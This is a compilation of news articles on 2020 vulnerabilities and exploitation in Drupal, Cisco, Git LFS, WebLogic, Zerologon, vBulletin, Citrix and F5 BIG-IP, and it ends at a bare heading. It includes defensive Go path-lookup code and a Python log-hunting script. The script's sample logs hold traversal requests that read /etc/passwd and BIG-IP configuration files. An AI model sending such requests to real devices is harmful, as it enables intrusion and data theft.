Out-of-band Drupal security updates fix bugs with known exploits

Drupal has released out-of-band security updates to fix two critical code execution flaws (CVE-2020-28948, CVE-2020-28949) in Drupal core, as “there are known exploits for one of core’s dependencies and some configurations of Drupal are vulnerable.”

The vulnerabilities (CVE-2020-28948, CVE-2020-28949)

CVE-2020-28948 and CVE-2020-28949 are arbitrary PHP code execution vulnerabilities found in the open source PEAR Archive_Tar library, which Drupal uses to handle TAR files in PHP.

“(The) vulnerabilities are possible if Drupal is configured to allow .tar, .tar.gz, .bz2, or .tlz file uploads and processes them,” the Drupal Security Team explained. Thus, preventing untrusted users from uploading these types of files serves as mitigation.

But, as the maintainers of the library have updated it with fixes and the Drupal team has already incorporated them, the best course of action for users is to upgrade their Drupal installation to versions 9.0.9, 8.9.10, 8.8.12, or 7.75 (depending on which branch they use).

The “known exploits” the Drupal team referenced can be found here.

They also pointed out that these newly patched vulnerabilities aren’t connected to some of those patched nearly a year ago, though “similar configuration changes may mitigate the problem until you are able to patch.”

This is the second time in the span of a week that the Drupal core receives security updates: the earlier ones fixed a code execution vulnerability (CVE-2020-13671) that could have been triggered by malicious files with a double extension.

The effectiveness of vulnerability disclosure and exploit development

New research into what happens after a new software vulnerability is discovered provides an unprecedented window into the outcomes and effectiveness of responsible vulnerability disclosure and exploit development.

The analysis of 473 publicly exploited vulnerabilities challenges long-held assumptions of the security space – namely, disclosure of exploits before a patch is available does not create a sense of urgency among companies to fix the problem.

The research was conducted by Kenna Security and the Cyentia Institute. It examines how the common practices among security researchers impact the overall security of corporate IT networks.

The importance of timing

The analysis found that when exploit code is made public prior to the release of a patch, cybercriminals get a critical head start. At the same time, when exploits are released before patches, it takes security teams more time to address the problem, even after the patch is released.

“The debate over responsible disclosure has existed for decades, but this data provides an objective correlation between vulnerability discovery, disclosure, and patch delivery for the first time ever,” said Ed Bellis, CTO of Kenna Security.

“However, the results raise several questions about responsible exposure, demonstrating that the timing of exploit code release can shift the balance in favor of attackers or defenders.”

Whether exploit code is released first or a patch is released first, the research found that there are periods of time when attackers have the momentum and when defenders have momentum – a reflection of the fact that no matter when a patch is released, some companies simply don’t or can’t install it before attackers make their move.

For approximately nine of the 15 months studied in this analysis, attackers were able to exploit vulnerabilities at a higher rate than defenders were patching, while defenders had the upper hand for six months.

The vulnerability disclosure practice

At the heart of the vulnerability disclosure practice is a mix of competing incentives for software publishers, IT teams, and the independent security researchers that find software vulnerabilities.

When a vulnerability is found, researchers disclose its existence and the relevant code they used to exploit the application. The publisher sets about creating a patch and pushing the patch to its user base. Occasionally, however, software publishers don’t engage, declining to create a patch or notify users of a vulnerability.

In these cases, researchers will publicly disclose the vulnerability to warn the larger community and spur the publisher to take action. Google, for example, tells software publishers that it will release details of the vulnerabilities it discovers within 90 days of notification, except in a few scenarios.

Additional findings

  • When exploit code is publicly released before a patch, attackers get, on average, a 47 day head start
  • Only 6% of those exploits were detected by more than 1/100 organizations
  • Exploit code was already available for over 50% of the vulnerabilities in our sample by the time they were published to the CVE List
  • In great news for defenders, over 80% of exploited vulnerabilities have a patch available prior to, or along with, CVE publication
  • About one-third of vulnerabilities have exploit code published before a patch is made available
  • About 7% of vulnerabilities are exploited before a CVE is published, a patch is available, and exploit code is released

“For decision-makers and researchers across the cybersecurity community, this research provides a vital, never before seen window into the lifecycle of vulnerabilities and exploitations,” said Jay Jacobs, partner, Cyentia Institute.

“These findings offer prominent paths for future research that could ultimately make the IT infrastructure more secure.”

Despite the strong relationship between disclosure of exploitation code and weaponization, the research requires some caveats. It’s possible that release of exploit code doesn’t facilitate exploitation, but detection of exploits in the wild, because the release of the code enabled faster creation of anti-virus signatures.

“This new report reignites the conversation on responsible disclosure. More research will help draw more definitive conclusions, but for now, we can say that where there’s smoke, there’s fire,” said Wade Baker, partner and co-founder of Cyentia Institute. “Release of exploit code before a patch seems to have a negative effect on corporate security.”

Critical vulnerabilities in Cisco Security Manager fixed, researcher discloses PoCs

Cisco has patched two vulnerabilities in its Cisco Security Manager solution, both of which could allow unauthenticated, remote attackers to gain access to sensitive information on an affected system.

Those are part of a batch of twelve vulnerabilities flagged in July 2020 by Florian Hauser, a security researcher and red teamer at Code White.

About the Cisco Security Manager vulnerabilities

Cisco Security Manager is a security management application that provides insight into and control of Cisco security and network devices deployed by enterprises – security appliances, intrusion prevention systems, firewalls, routers, switches, etc.

Cisco has fixed two vulnerabilities affecting Cisco Security Manager v4.21 and earlier, by pushing out v4.22:

  • CVE-2020-27130, a critical path traversal vulnerability that could be exploited by sending a crafted request to the affected device and could result in the attacker downloading arbitrary files from it
  • CVE-2020-27125, which could allow an attacker to view static credentials in the solution’s source code

Cisco has also simultaneously announced that it will fix multiple Java deserialization vulnerabilities (collectively designated as CVE-2020-27131) in the upcoming v4.23 of the Cisco Security Manager solution. Those could allow unauthenticated, remote attackers to execute arbitrary commands on an affected instance and could be triggered by sending a malicious serialized Java object to a specific listener on an affected system.

The company’s Product Security Incident Response Team (PSIRT) has noted that public announcements about all these vulnerabilities are available, but that they are “not aware” of instances of actual malicious use in the wild.

The public announcement they are referring to is a post on Gist, a pastebin service operated by GitHub, through which Hauser shared PoCs for the flaws he discovered and flagged.

Git LFS vulnerability allows attackers to compromise targets’ Windows systems (CVE-2020-27955)

A critical vulnerability (CVE-2020-27955) in Git Large File Storage (Git LFS), an open source Git extension for versioning large files, allows attackers to achieve remote code execution if the Windows-using victim is tricked into cloning the attacker’s malicious repository using a vulnerable Git version control tool, security researcher Dawid Golunski has discovered.

It can be exploited in a variety of popular Git clients in their default configuration – GitHub CLI, GitHub Desktop, SmartGit, SourceTree, GitKraken, Visual Studio Code, etc. – and likely other clients/development IDEs (i.e., those that install git with the Git LFS extension by default).

“Web applications / hosted repositories running on Windows which allow users to import their repositories from a URL may also be exposed to this vulnerability,” Golunski added.

About the vulnerability (CVE-2020-27955)

Golunski found that Git LFS does not specify a full path to the git binary when executing a new git process via a specific exec.Command() function.

“As the exec.Command() implementation on Windows systems includes the current directory, attackers may be able to plant a backdoor in a malicious repository by simply adding an executable file named: git.bat, git.exe, git.cmd or any other extension that is used on the victim’s system (PATHEXT environment dependent), in the main repo’s directory. As a result, the malicious git binary planted in this way will get executed instead of the original git binary located in a trusted path,” he explained.

The vulnerability can be triggered if the victim is tricked into cloning the attacker’s malicious repository using a vulnerable Git version control tool.
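The hardened lookup below is an added example, not Git LFS’s own code: it resolves a bare program name only against absolute directories listed in PATH, honours PATHEXT, and never falls back to the working directory, which is the behaviour described above. The gitPath helper shows the standard-library check available since Go 1.19, where exec.LookPath reports a working-directory match as exec.ErrDot. The names resolveTrusted, gitPath, ErrCurrentDir and the in-memory file list are assumptions.

```go
package main

import (
	"errors"
	"fmt"
	"os/exec"
	"strings"
)

// ErrCurrentDir is returned when PATH contains an entry (empty, "." or any
// relative directory) that Windows would resolve against the working
// directory, and no trusted absolute directory provided the program.
var ErrCurrentDir = errors.New("refusing to resolve executable from current directory")

// isAbsWindows reports whether dir is an absolute Windows path: a drive
// letter followed by ":\" (or ":/"), or a UNC path starting with "\\".
func isAbsWindows(dir string) bool {
	if strings.HasPrefix(dir, `\\`) {
		return true
	}
	return len(dir) >= 3 && dir[1] == ':' && (dir[2] == '\\' || dir[2] == '/')
}

// resolveTrusted searches only absolute directories listed in pathEnv for a
// bare program name, trying each extension in pathExt (Windows PATHEXT
// semantics, lower-cased). exists is the file-existence check, injected so
// the lookup can be exercised offline against a constructed file list.
func resolveTrusted(name, pathEnv, pathExt string, exists func(string) bool) (string, error) {
	// A name with a directory component bypasses PATH entirely; reject it so
	// a relative path such as ".\git" cannot sneak in.
	if strings.ContainsAny(name, `/\`) {
		return "", fmt.Errorf("program name %q must not contain a path separator", name)
	}
	exts := strings.Split(strings.ToLower(pathExt), ";")
	sawUntrusted := false
	for _, dir := range strings.Split(pathEnv, ";") {
		if !isAbsWindows(dir) {
			sawUntrusted = true // skipped: would resolve against the working directory
			continue
		}
		for _, ext := range exts {
			if ext == "" {
				continue
			}
			candidate := strings.TrimRight(dir, `\/`) + `\` + strings.ToLower(name) + ext
			if exists(candidate) {
				return candidate, nil
			}
		}
	}
	if sawUntrusted {
		return "", ErrCurrentDir
	}
	return "", exec.ErrNotFound
}

// gitPath resolves the real git binary with the standard library. Since
// Go 1.19, exec.LookPath refuses a match found via the working directory and
// reports it as exec.ErrDot; mapping that onto ErrCurrentDir gives callers
// one error to handle.
func gitPath() (string, error) {
	p, err := exec.LookPath("git")
	if errors.Is(err, exec.ErrDot) {
		return "", ErrCurrentDir
	}
	return p, err
}

func main() {
	// Constructed file list standing in for a victim's Windows filesystem:
	// the real git lives in a trusted directory, a planted git.bat sits in
	// the cloned repository, which is the working directory.
	files := map[string]bool{
		`C:\Program Files\Git\cmd\git.exe`: true,
		`C:\repo\git.bat`:                  true,
	}
	exists := func(p string) bool { return files[p] }
	pathExt := ".COM;.EXE;.BAT;.CMD"

	p, err := resolveTrusted("git", `C:\Windows\system32;C:\Program Files\Git\cmd`, pathExt, exists)
	fmt.Println(p, err) // C:\Program Files\Git\cmd\git.exe <nil>

	_, err = resolveTrusted("git", `.;C:\Windows\system32`, pathExt, exists)
	fmt.Println(err) // refusing to resolve executable from current directory
}
```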

Golunski says that CVE-2020-27955 is trivial to exploit, and has released PoC exploit code, as well as video demonstrations of the exploit in action on various Git clients.

What to do?

The vulnerability affects Git LFS versions 2.12 or earlier on Windows systems (but not on Unix). According to the Git LFS maintainers, there is no workaround for this issue other than avoiding untrusted repositories.

Affected users and product vendors are advised to update to the latest Git LFS version (v2.12.1, released on Wednesday), which plugged the security hole. Git for Windows has also been updated to include this Git LFS version.

Google fixes two actively exploited Chrome zero-days (CVE-2020-16009, CVE-2020-16010)

For the third time in two weeks, Google has patched Chrome zero-day vulnerabilities that are being actively exploited in the wild: CVE-2020-16009 is present in the desktop version of the browser, CVE-2020-16010 in the mobile (Android) version.

About the vulnerabilities (CVE-2020-16009, CVE-2020-16010)

As per usual, Google has refrained from sharing much detail about each of the patched vulnerabilities, so all we know is this: CVE-2020-16009 is an inappropriate implementation flaw in V8, Chrome’s open source …

Easily exploitable RCE in Oracle WebLogic Server under attack (CVE-2020-14882)

A critical and easily exploitable remote code execution vulnerability (CVE-2020-14882) in Oracle WebLogic Server is being targeted by attackers, SANS ISC has warned.

Oracle WebLogic is a Java EE application server that is part of Oracle’s Fusion Middleware portfolio and supports a variety of popular databases. These servers are often targeted by attackers, whether for cryptocurrency mining or as a way into other enterprise systems.

About the vulnerability (CVE-2020-14882)

CVE-2020-14882 may allow unauthenticated attackers with network access via HTTP to achieve total compromise and takeover of vulnerable Oracle WebLogic Servers.

The vulnerability affects Oracle WebLogic Server versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0, and was patched by Oracle last week.

Dr. Johannes Ullrich, Dean of Research at the SANS Technology Institute, said that SANS ISC’s honeypots are getting hit by exploit attempts originating from four IP addresses.

For now, the attackers are only probing to see whether the target systems are vulnerable, but that’s likely because the honeypots did not return the “correct” response.

“The exploit appears to be based on this blog post published in Vietnamese by ‘Jang’,” he added. (The researcher in question has previously flagged several flaws in Oracle’s offerings, though not this one.)

The exploit allows attackers to achieve RCE on a vulnerable Oracle WebLogic Server by sending one simple POST request.

A demonstration of the exploit in action is available here.

The PoC exploit was published yesterday, and it didn’t take long for attackers to take advantage of it. Admins are advised to patch vulnerable systems as soon as possible.

Attacks on IoT devices continue to escalate

Attacks on IoT devices continue to rise at an alarming rate due to poor security protections and cybercriminals’ use of automated tools to exploit these vulnerabilities, according to Nokia.

IoT devices most infected

The report found that internet-connected, or IoT, devices now make up roughly 33% of infected devices, up from about 16% in 2019. The report’s findings are based on data aggregated from monitoring network traffic on more than 150 million devices globally.

Adoption of IoT devices, from smart home security monitoring systems to drones and medical devices, is expected to continue growing as consumers and enterprises move to take advantage of the high bandwidth, ultra-low latency, and fundamentally new networking capabilities that 5G mobile networks enable, according to the report.

The rate of success in infecting IoT devices depends on the visibility of the devices to the internet, according to the report. In networks where devices are routinely assigned public facing internet IP addresses, a high infection rate is seen.

In networks where carrier-grade Network Address Translation is used, the infection rate is considerably reduced, because the vulnerable devices are not visible to network scanning.

Cybercriminals taking advantage of the pandemic

The report also reveals there is no let up in cybercriminals using the COVID-19 pandemic to try to steal personal data through a variety of types of malware. One in particular is disguised as a Coronavirus Map application – mimicking the legitimate and authoritative Coronavirus Map issued by Johns Hopkins University – to take advantage of the public’s demand for accurate information about COVID-19 infections, deaths and transmissions.

But the bogus application is used to plant malware on victims’ computers to exploit personal data. “Cybercriminals are playing on people’s fears and are seeing this situation as an opportunity to promote their agendas,” the report says. The report urges the public to install applications only from trusted app stores, like Google and Apple.

Bhaskar Gorti, President and Chief Digital Officer, Nokia, said: “The sweeping changes that are taking place in the 5G ecosystem, with even more 5G networks being deployed around the world as we move to 2021, open ample opportunities for malicious actors to take advantage of vulnerabilities in IoT devices.

“This report reinforces not only the critical need for consumers and enterprises to step up their own cyber protection practices, but for IoT device producers to do the same.”

Are your domain controllers safe from Zerologon attacks?

CVE-2020-1472, a privilege elevation vulnerability in the Netlogon Remote Protocol (MS-NRPC) for which Microsoft released a patch in August, has just become a huge liability for organizations that are struggling with timely patching.

Secura researchers – the very same ones who found and disclosed the flaw to Microsoft – have published additional technical details on Monday, and just a few hours later several PoC exploit/tools have been published on GitHub.

About CVE-2020-1472

CVE-2020-1472 (aka Zerologon) affects all supported Windows Server versions, but the danger is highest for servers that function as Active Directory domain controllers in enterprise networks.

The vulnerability stems from a flaw in a cryptographic authentication scheme used by the Netlogon Remote Protocol.

“By simply sending a number of Netlogon messages in which various fields are filled with zeroes, an attacker can change the computer password of the domain controller that is stored in the AD. This can then be used to obtain domain admin credentials and then restore the original DC password,” Secura researchers explained.

“This attack has a huge impact: it basically allows any attacker on the local network (such as a malicious insider or someone who simply plugged in a device to an on-premise network port) to completely compromise the Windows domain. The attack is completely unauthenticated: the attacker does not need any user credentials.”

“In a hypothetical attack, one could use this vulnerability to deploy ransomware throughout an organization and maintain a persistent presence if cleanup and restoration efforts miss any additional malicious scripts,” Tenable security response manager Ryan Seguin noted.

“Organizations with network-accessible backups could end up with a perfect storm if a ransomware group destroys backups to increase their likelihood of payout from the victim organization.”

Exploitation

Many PoC exploits have been released by security researchers in the past day (1, 2, 3, 4), and the effectiveness of some of them has been confirmed:

Secura researchers published a Python script organizations can use to check whether a domain controller is vulnerable or not.

Remediation

Systems that have received the patch released in August are safe from attack, as it enforces secure NRPC for all Windows servers and clients in the domain. All Active Directory domain controllers should be updated, including read-only domain controllers.

“The updates will enable the Domain Controllers (DCs) to protect Windows devices by default, log events for non-compliant device discovery, and have the option to enable protection for all domain-joined devices with explicit exceptions,” Microsoft explained.

But complete remediation will happen after organizations deploy Domain Controller (DC) enforcement mode, which requires all Windows and non-Windows devices to use secure NRPC or to explicitly allow the account by adding an exception for any non-compliant device.

While organizations can deploy DC enforcement mode immediately by enabling a specific registry key, on February 9, 2021, DCs will be placed in enforcement mode automatically.

This phased rollout is due to the fact that there are many non-Windows device implementations of the Netlogon Remote Protocol, and vendors of non-compliant implementations have been given enough time to provide customers with the needed updates.

New attack vectors make securing virtual companies even more challenging

As organizations settle into long-term remote working, new attack vectors for opportunistic cyberattackers, and new challenges for network administrators, have been introduced, Nuspire reveals.

Now six months into the pandemic, attackers pivoted away from COVID-19 themes, instead utilizing other prominent media themes like the upcoming U.S. election to wreak havoc.

Increase in both botnet and exploit activity

There was an increase in both botnet and exploit activity over the course of Q2 2020 by 29% and 13% respectively—that’s more than 17,000 botnet and 187,000 exploit attacks a day.

While attackers targeted remote work technology at the source to obtain access to the enterprise in Q1 2020, there was a shift in tactics to leverage botnets to obtain a foothold in the network. Home routers typically are not monitored by IT teams and have therefore become a viable attack method that avoids detection while infiltrating corporate networks.

“Today, the pandemic has complicated an already complex threat landscape. CISOs are under great pressure to ensure their virtual organizations are secure,” said Lewie Dunsworth, CEO of Nuspire.

“Threat vectors will continue to evolve as the uncertainty of our world continues to play out. That’s why our team analyzes the latest threat intelligence daily and uses this data to engage in proactive threat hunting and response to ensure our clients have the upper hand.”

Additional findings

  • The ZeroAccess botnet made a resurgence in Q2, coming in second for most used botnet. ZeroAccess was originally terminated in 2013 but has made rare resurgences over the last seven years.
  • There was a significant spike (1,310% peak mid-quarter) in exploit attempts against Shellshock, an exploit discovered in 2014, demonstrating that attackers attempt to exploit old vulnerabilities to catch old operating systems and unpatched systems.
  • A new signature, dubbed MSOffice Sneaky, that was released during Q2 has been identified: documents containing malicious macros reach out to command and control servers to download malware of the attackers’ choosing. This attack vector is increasingly dangerous, especially when remote employees disconnect from their VPN.
  • DoublePulsar, the exploit developed by the NSA, continues to dominate the exploit chart, consisting of 72% of all exploit attempts witnessed at Nuspire.

Exploits for vBulletin zero-day released, attacks are ongoing

The fix for CVE-2019-16759, a remote code execution vulnerability in vBulletin that was patched in September 2019, is incomplete, security researcher Amir Etemadieh has discovered.

The discovery and his publishing of PoC and full exploits spurred attackers to launch attacks:

Several other admins confirmed that they’ve been hit.

Risk mitigation and prevention

Etemadieh explained how he discovered that the patch for CVE-2019-16759 was flawed in a blog post published on Sunday.

It’s a quality write-up and contains a one-line PoC exploit and full exploits written in Bash, Python and Ruby, as well as instructions on how to implement a fix until a more complete patch is released (in short, forum admins were advised to temporarily disable PHP widgets).

“Tenable Research has tested the proof of concept from Etemadieh and confirmed successful exploitation using the latest version of vBulletin,” Tenable research engineer Satnam Narang confirmed.

Internet Brands, the makers of vBulletin, were not notified of this discovery prior to the publication, so they’ve scrambled to fix the flaw again.

New patches have been made available on Monday, for versions 5.6.2, 5.6.1 and 5.6.0 of vBulletin Connect, and they disable the PHP Module widget. The upcoming v5.6.3 will contain the patch.

“All older versions should be considered vulnerable. Sites running older versions of vBulletin need to be upgraded to vBulletin 5.6.2 as soon as possible,” they advised, and noted that vBulletin Cloud sites are not affected by this issue.

vBulletin is the most popular internet forum software in use today and also powers many dark web forums. vBulletin flaws, especially when they allow remote code execution without authentication, are usually speedily leveraged by attackers, so admins are advised to implement the patches ASAP.

Critical ManageEngine ADSelfService Plus RCE flaw patched

A critical vulnerability (CVE-2020-11552) in ManageEngine ADSelfService Plus, an Active Directory password-reset solution, could allow attackers to remotely execute commands with system level privileges on the target Windows host.

About ManageEngine ADSelfService Plus

ManageEngine ADSelfService Plus is developed by ManageEngine, a division of Zoho Corporation, a software development company that focuses on web-based business tools and information technology.

“ADSelfService Plus supports self-service password reset for WFH and remote users by enabling users to reset Windows password from their own machines and updating the cached credentials through a VPN client,” the company touts.

It also supports sending password expiration notifications to remote users through email, SMS, and push notifications; provides admins with a way to force 2-factor authentication for Windows logons; and provides users with secure access to all SAML-supported enterprise applications (e.g., Office 365, G Suite, Salesforce) through AD-based single sign-on.

About the vulnerability (CVE-2020-11552)

Unearthed and flagged by Bhadresh Patel, CVE-2020-11552 stems from the solution not properly enforcing user privileges associated with Windows Certificate Dialog.

The ManageEngine ADSelfService Plus thick client software enables users to perform a password reset or an account unlock action by using the self-service option on the Windows login screen. When one of these options is selected, the client software is launched and connects to a remote ADSelfService Plus server to facilitate the self-service operations.

“A security alert can/will be triggered when ‘an unauthenticated attacker having physical access to the host issues a self-signed SSL certificate to the client’. Or, ‘a (default) self-signed SSL certificate is configured on ADSelfService Plus server’,” he noted.

“‘ViewCertificate’ option from the security alert will allow an attacker with physical access or a remote attacker with RDP access, to export a displayed certificate to a file. This will further cascade to the standard dialog/wizard which will open file explorer as SYSTEM. By navigating file explorer through ‘C:\windows\system32’, a cmd.exe can be launched as a SYSTEM.”

Patel also published a PoC exploit video (the exploitation part starts at 5:30):

ManageEngine patched CVE-2020-11552 twice, because the first patch only fixed the issue partially. Admins are advised to upgrade to ADSelfService Plus build 6003, which contains the complete security fix.

Attackers are exploiting Cisco ASA/FTD flaw in search for sensitive data

An unauthenticated file read vulnerability (CVE-2020-3452) affecting Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software is being exploited by attackers in the wild.

For the moment, it seems that it is being used just to read Lua source files, but it can be used to view files that may contain information such as WebVPN configuration, bookmarks, web cookies, partial web content, and HTTP URLs.

About the vulnerability (CVE-2020-3452)

CVE-2020-3452 affects the web services interface of Cisco ASA and Cisco FTD software and can be exploited by remote unauthenticated attackers to read sensitive files within the web services file system on the targeted device (but not to obtain access to ASA or FTD system files or underlying operating system files).

“The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device,” Cisco explained.

Devices are vulnerable only if they are running a vulnerable release of the software AND are configured with either WebVPN or AnyConnect features.

The vulnerability was discovered by Mikhail Klyuchnikov of Positive Technologies and Abdulrahman Nour and Ahmed Aboul-Ela of RedForce. Cisco patched it last week by releasing security updates and hotfixes. Shortly after, Aboul-Ela published a PoC for it:

Cisco confirmed that exploitation attempts started the day after. Rapid7 scanned for internet-accessible ASA/FTD devices and found 85,000.

“Since it is difficult (if not impossible) to legally fingerprint Cisco ASA/FTD versions remotely, Rapid7 Labs revisited the ‘uptime’ technique described in a 2016 blog post for another Cisco ASA vulnerability, which shows that only about 10% of Cisco ASA/FTD devices have been rebooted since the release of the patch. This is a likely indicator they’ve been patched,” noted Bob Rudis, Chief Data Scientist at Rapid7.

Attackers are probing Citrix controllers and gateways through recently patched flaws

Earlier this week, Citrix released security updates for Citrix Application Delivery Controller (ADC), Citrix Gateway, and the Citrix SD-WAN WANOP appliance, and urged admins to apply them as soon as possible to reduce risk.

At the time, there was no public attack code and no indication that any of the fixed flaws were getting actively exploited.

On Thursday, though, SANS ISC’s Dr. Johannes Ullrich spotted attackers attempting to exploit two of the Citrix vulnerabilities on his F5 BigIP honeypot (set up to flag CVE-2020-5902 exploitation attempts).

About the vulnerabilities

The fixed flaws are 11 in total, ranging from information disclosure and DoS bugs to elevation of privilege, XSS and code injection flaws.

The security advisory Citrix published noted them and laid out the pre-conditions needed for their exploitation, but does not contain too many details.

“We are limiting the public disclosure of many of the technical details of the vulnerabilities and the patches to further protect our customers. Across the industry, today’s sophisticated malicious actors are using the details and patches to reverse engineer exploits. As such, we are taking steps to advise and help our customers but also do what we can to shield intelligence from malicious actors,” Citrix CISO Fermin Serna explained, and made sure to note that the patches provided fully resolve all issues.

He also pointed out that of the 11 vulnerabilities, there are six possible attack routes, and five of those have barriers to exploitation.

Finally, he added that the vulnerabilities have no link to CVE-2019-19781, the remote code execution flaw that’s been heavily exploited by attackers since late December/early January.

About the recent exploitation attempts

Dr. Ullrich said that they are seeing some scans that are looking for systems that haven’t been patched yet.

“One interesting issue is that most of the scans originate from a single ISP so far, suggesting that this may be just one group at this point trying to enumerate vulnerable systems,” he told Help Net Security.

“Vulnerable systems leak information about the system if hit with these exploits. So these are not as dangerous as the code execution issues we saw with Citrix over new year, or the F5 issues. But enumerating systems, and using the leaked information may lead to additional more targeted follow on attacks later.”

One of the exploited vulnerabilities allows arbitrary file downloads, the other allows retrieval of a PCI-DSS report without authentication.

“Some of the other vulnerabilities patched with this update are ‘interesting’, but more tricky to exploit,” he added.

Attackers are bypassing F5 BIG-IP RCE mitigation – you might want to patch after all

Attackers are bypassing a mitigation for the BIG-IP TMUI RCE vulnerability (CVE-2020-5902) originally provided by F5 Networks, NCC Group’s Research and Intelligence Fusion Team has discovered.

“Early data made available to us, as of 08:05 on July 8, 2020, is showing of ~10,000 Internet exposed F5 devices that ~6,000 were made potentially vulnerable again due to the bypass,” they warned.

F5 Networks has updated the security advisory to reflect this discovery and to provide an updated version of the mitigation. The advisory has also been updated with helpful notes regarding the impact of the flaw, the various mitigations, as well as indicators of compromise.

CVE-2020-5902 exploitation attempts

CVE-2020-5902 was discovered and privately disclosed by Positive Technologies researcher Mikhail Klyuchnikov.

F5 Networks released patches and published mitigations last Wednesday and PT followed with more information.

Security researchers were quick to set up honeypots to detect exploitation attempts and, a few days later, after several exploits had been made public, the attempts started.

Some were reconnaissance attempts, some tried to deliver backdoors, DDoS bots, coin miners, web shells, etc. Some were attempts to scrape admin credentials off vulnerable devices in an automated fashion.

There’s also a Metasploit module for CVE-2020-5902 exploitation available (and in use).

What now?

Any organization that applied the original, incomplete mitigation instead of patching their F5 BIG-IP boxes should take action again: apply the updated mitigation from the revised advisory or, better still, install the fixed software version.

They should also check whether their devices have been compromised in the interim.

Attackers are breaching F5 BIG-IP devices, check whether you’ve been hit

Attackers are actively trying to exploit CVE-2020-5902, a critical vulnerability affecting F5 Networks‘ BIG-IP multi-purpose networking devices, to install coin-miners, IoT malware, or to scrape administrator credentials from the hacked devices.


About CVE-2020-5902

CVE-2020-5902 is a critical remote code execution vulnerability in the configuration interface (aka Traffic Management User Interface – TMUI) of BIG-IP devices used by some of the world’s biggest companies.

It was unearthed along with CVE-2020-5903, a less critical XSS vulnerability that enables running malicious JavaScript code as the logged-in user on BIG-IP devices, by Positive Technologies researcher Mikhail Klyuchnikov.

To exploit CVE-2020-5902, an attacker needs to send a specifically crafted HTTP request to the server hosting the Traffic Management User Interface (TMUI) utility for BIG-IP configuration.

“By exploiting this vulnerability, a remote attacker with access to the BIG-IP configuration utility could, without authorization, perform remote code execution. The attacker can create or delete files, disable services, intercept information, run arbitrary system commands and Java code, completely compromise the system, and pursue further targets, such as the internal network,” the researcher noted.

“RCE in this case results from security flaws in multiple components, such as one that allows directory traversal exploitation. This is particularly dangerous for companies whose F5 BIG-IP web interface is listed on search engines such as Shodan. Fortunately, most companies using the product do not enable access to the interface from the internet.”
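A log-hunting check for the traversal just described, added here as an example; it is not code from F5, NCC Group or Positive Technologies. It reads access logs of the configuration utility in common log format and assumes the `/tmui/` prefix and the `..;` (servlet path parameter plus parent directory) sequence from public reporting on CVE-2020-5902; the addresses, timestamps and JSP names in the sample lines are constructed placeholders. The design point, given that a first mitigation was bypassed, is to stop matching literal substrings: decode percent-encoding, strip path parameters and resolve dot-segments first, then judge what the request actually reached.

```python
"""Hunt for TMUI path-traversal attempts in BIG-IP management access logs."""
import re
from urllib.parse import unquote

# Constructed, common-log-format lines standing in for exported access logs
# of the BIG-IP configuration utility (TMUI). The "/tmui/" prefix and the
# "..;" path-parameter traversal come from public reporting on
# CVE-2020-5902; addresses, timestamps and JSP names are placeholders.
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Jul/2020:10:01:02 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 1234',
    '203.0.113.9 - - [05/Jul/2020:10:01:05 +0000] "GET /tmui/login.jsp/..;/locallb/workspace/read.jsp?fileName=/etc/passwd HTTP/1.1" 200 2048',
    '203.0.113.9 - - [08/Jul/2020:07:55:11 +0000] "GET /tmui/login.jsp/%2e%2e%3b/locallb/workspace/read.jsp?fileName=/config/bigip.conf HTTP/1.1" 200 4096',
    '198.51.100.7 - - [08/Jul/2020:08:02:41 +0000] "GET /tmui/login.jsp/%252e%252e;/locallb/workspace/cmd.jsp HTTP/1.1" 404 0',
    '198.51.100.8 - - [08/Jul/2020:08:05:00 +0000] "GET /tmui/login.jsp;jsessionid=ABC123?msgcode=1 HTTP/1.1" 200 1234',
    '198.51.100.8 - - [08/Jul/2020:08:05:30 +0000] "POST /tmui/locallb/workspace/cmd.jsp HTTP/1.1" 302 0',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+)[^"]*" (?P<status>\d{3})')


def decode_fully(s, rounds=3):
    """Undo percent-encoding repeatedly (bounded) so double-encoded
    traversal characters become visible."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def effective_path(path):
    """Resolve the path the way a servlet container does before matching it:
    drop ';param' path parameters from every segment, then collapse '.' and '..'."""
    out = []
    for seg in path.split('/'):
        seg = seg.split(';', 1)[0]
        if seg in ('', '.'):
            continue
        if seg == '..':
            if out:
                out.pop()
            continue
        out.append(seg)
    return '/' + '/'.join(out)


def analyze_uri(uri):
    """Return (effective_path, reasons); an empty reasons list means benign."""
    raw_path = uri.split('?', 1)[0]
    decoded = decode_fully(raw_path)
    reasons = set()
    # Encoding that hides '..' or ';' from a literal-substring filter.
    if decoded != raw_path and (decoded.count('..') > raw_path.count('..')
                                or decoded.count(';') > raw_path.count(';')):
        reasons.add('percent-encoded traversal characters')
    segments = decoded.split('/')
    last = len(segments) - 1
    for i, seg in enumerate(segments):
        base, sep, _ = seg.partition(';')
        if base == '..':
            reasons.add('dot-dot segment')
        # ';jsessionid=...' legitimately sits on the final segment only; a
        # path parameter in the middle of the path is the traversal trick.
        if sep and i != last:
            reasons.add('path parameter on non-final segment')
    return effective_path(decoded), sorted(reasons)


def hunt(lines):
    """Flag requests whose decoded, resolved path was reached via traversal."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target, reasons = analyze_uri(m['uri'])
        if reasons:
            findings.append({'ip': m['ip'], 'time': m['ts'], 'status': int(m['status']),
                             'target': target, 'reasons': reasons, 'raw': m['uri']})
    return findings


def attacker_ips(findings):
    """Distinct source addresses to pivot on in other logs."""
    return sorted({f['ip'] for f in findings})


if __name__ == '__main__':
    for f in hunt(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} -> {f['target']} [{f['status']}] {', '.join(f['reasons'])}")
    print('sources:', attacker_ips(hunt(SAMPLE_LOG)))
```

A `;jsessionid=` on the final segment is how a servlet container carries sessions, so only a path parameter in the middle of the path counts; a 404 on a flagged request still means somebody tried. Treat any hit as a reason to run F5's published indicators of compromise against the device, not as proof of compromise on its own.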

Shodan shows around 8,500 vulnerable devices available on the internet, nearly 40% of which are in the U.S.

Active exploitation

